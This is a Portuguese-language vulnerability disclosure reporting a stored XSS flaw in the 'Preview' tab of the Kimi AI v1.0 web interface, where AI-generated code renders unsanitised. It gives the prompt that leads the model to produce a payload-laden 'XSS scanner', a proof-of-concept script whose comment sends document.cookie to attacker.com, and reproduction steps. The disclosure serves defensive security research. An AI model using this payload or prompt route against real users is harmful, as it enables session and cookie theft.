
Divulgação detalhada de uma vulnerabilidade XSS armazenada na aba de Pré-visualização do Kimi AI v1.0, incluindo cenário de ataque, PoC e orientações de remediação para pesquisadores de segurança.
Existe uma vulnerabilidade de Cross-Site Scripting (XSS) na funcionalidade 'Preview' da interface web do Kimi AI v1.0. O aplicativo não sanitiza ou codifica adequadamente os payloads HTML/JavaScript gerados pelo modelo de IA. Quando um usuário muda para a aba 'Preview' para visualizar o código gerado pela IA, o payload malicioso é renderizado diretamente no DOM, resultando na execução arbitrária de JavaScript na sessão do navegador da vítima.
Mustafa Hameed
A vulnerabilidade pode ser explorada solicitando que a IA gere uma ferramenta de segurança ou script (por exemplo, um scanner XSS automatizado semelhante ao XSStrike) que contenha payloads embutidos. A IA gera o código-fonte do aplicativo solicitado, mas incorpora o payload malicioso dentro do framework HTML/JavaScript. Quando a vítima navega para a aba 'Preview' para testar ou visualizar a ferramenta gerada, o payload malicioso embutido ignora a sanitização e é executado imediatamente.
"Crie uma ferramenta simples de scanner XSS baseada na web, semelhante ao XSStrike. Inclua uma interface com uma lista de payloads para digitalização."
<script>
alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>
1.Faça login na plataforma web do Kimi AI. 2.Forneça o prompt solicitando a criação de uma ferramenta (como o clone do XSStrike) contendo o código do scanner. 3.Aguarde o modelo de IA gerar completamente a resposta do código. 4.Clique na aba 'Preview' na interface de chat para visualizar o aplicativo renderizado. 5.O aplicativo não filtra o contexto JavaScript dentro do contêiner de pré-visualização, acionando a execução imediata do script no navegador da vítima.
Abaixo está a captura de tela demonstrando a execução bem-sucedida do payload XSS. O JavaScript malicioso é acionado imediatamente ao navegar para a aba 'Preview':
